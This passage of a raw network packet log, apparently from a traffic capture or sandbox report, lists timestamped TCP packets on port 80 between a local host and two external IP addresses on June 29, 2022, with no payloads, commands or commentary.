Jun 29, 2022 23:12:03.633038044 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633061886 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633084059 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.633084059 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633109093 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633131027 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633132935 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.633155107 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633177996 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.633177996 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633203030 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633225918 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633227110 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.633249998 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633272886 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633279085 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.633297920 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633321047 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633322954 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.633344889 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633366108 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.633367062 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633392096 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633411884 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.633414030 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633438110 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633459091 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633459091 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.633482933 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633493900 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.633506060 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633528948 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633550882 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633553028 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.633569002 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633590937 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.633591890 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633615971 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633636951 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.633637905 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633662939 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633682966 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.633683920 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633708954 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633730888 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633737087 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.633754969 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633768082 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.633779049 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633800983 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633822918 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633824110 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.633846045 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633867979 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.633867979 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633893967 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633907080 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.633919001 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.633949995 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.637490988 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.637659073 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.637682915 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.637706041 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.637707949 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.637729883 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.637753010 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.637753963 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.637793064 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.637856960 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.637880087 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.637902021 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.637924910 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.637926102 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.637948990 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.637960911 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.637974977 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.637998104 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638011932 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.638022900 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638046980 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638057947 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.638071060 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638093948 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638108015 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.638118982 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638142109 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638154030 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.638166904 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638190985 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638202906 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.638215065 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638237000 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638247967 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.638261080 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638283968 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638294935 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.638308048 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638329983 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638351917 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.638351917 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638376951 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638392925 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.638401985 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638425112 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638436079 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.638449907 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638473034 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638487101 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.638499022 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638520956 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638544083 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638545990 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.638569117 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638580084 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.638593912 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638617039 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638628006 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.638641119 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638664007 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638675928 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.638688087 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638710022 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638722897 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.638734102 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638756990 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638777971 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638778925 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.638802052 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638824940 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638824940 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.638849974 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638860941 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.638875008 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638897896 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638919115 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.638919115 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638943911 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638957024 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.638967037 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.638991117 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.639000893 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.639014006 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.639036894 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.639050961 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.639064074 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.639086008 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.639097929 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.639110088 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.639132023 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.639143944 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.639156103 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.639178038 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.639199972 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.639209032 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.639224052 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.639246941 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.639246941 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.639271975 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.639292002 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.639293909 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.639318943 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.639338970 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.639339924 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.639364958 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.639378071 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.639389038 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.639411926 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.639422894 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.639436007 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.639457941 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.639481068 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.639481068 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.639506102 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.639525890 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:03.639528990 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.639564037 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.663696051 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:03.974927902 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:04.666759968 CEST	49773	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:04.971595049 CEST	80	49773	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:04.971679926 CEST	49773	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:04.971859932 CEST	49773	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:04.971883059 CEST	49773	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:05.276165009 CEST	80	49773	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:05.766639948 CEST	80	49773	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:05.766863108 CEST	80	49773	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:05.766918898 CEST	49773	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:05.766948938 CEST	49773	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:06.071343899 CEST	80	49773	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:06.345565081 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:06.584176064 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:06.584276915 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:06.584472895 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:06.584487915 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:06.823426008 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:07.501221895 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:07.501255035 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:07.501413107 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:07.742624998 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:07.742655039 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:07.742762089 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:07.752203941 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:07.811521053 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:07.983689070 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:07.983730078 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:07.983753920 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:07.983851910 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:08.052299023 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:08.052340984 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:08.052495003 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:08.224545956 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:08.224587917 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:08.224719048 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:08.226510048 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:08.292195082 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:08.292243958 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:08.292269945 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:08.292365074 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:08.292407990 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:08.295169115 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:08.420934916 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:08.466424942 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:08.466463089 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:08.466600895 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:08.467010975 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:08.533890009 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:08.533931971 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:08.534060955 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:08.535281897 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:08.535310030 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:08.535327911 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:08.535346985 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:08.535415888 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:08.535448074 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:08.663824081 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:08.663857937 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:08.664016008 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:08.709099054 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:08.709137917 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:08.709275961 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:08.714355946 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:08.774502993 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:08.774535894 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:08.774553061 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:08.774694920 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:08.776335001 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:08.780095100 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:08.780126095 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:08.780142069 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:08.780225992 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:08.780273914 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:08.781311989 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:08.781339884 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:08.781357050 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:08.781419992 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:08.904177904 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:08.904300928 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:08.910676003 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:08.915819883 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:08.915918112 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:08.951919079 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:08.951946020 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:08.952063084 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:08.955159903 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.017788887 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.017895937 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.024987936 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.025012970 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.025032043 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.025154114 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.026045084 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.026067019 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.026083946 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.026099920 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.026118040 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.026134014 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.026197910 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.026405096 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.026531935 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.026585102 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.027316093 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.027334929 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.027398109 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.028430939 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.108519077 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.147340059 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.147375107 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.147392035 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.147524118 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.156776905 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.156802893 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.156860113 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.156889915 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.156927109 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.193638086 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.193675041 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.193766117 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.197949886 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.258043051 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.258070946 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.258088112 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.258147001 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.258179903 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.266658068 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.266680002 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.266751051 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.267905951 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.267926931 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.267945051 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.267961025 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.267977953 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.267995119 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.268004894 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.268052101 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.268111944 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.268157005 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.268173933 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.268203020 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.268979073 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.268999100 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.269032955 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.269356966 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.269376993 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.269393921 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.269403934 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.269411087 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.269433975 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.311630964 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.349451065 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.349477053 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.349558115 CEST	49775	80	192.168.2.3	190.117.75.91
Jun 29, 2022 23:12:09.391738892 CEST	80	49775	190.117.75.91	192.168.2.3
Jun 29, 2022 23:12:09.391772985 CEST	80	49775	190.117.75.91	192.168.2.3
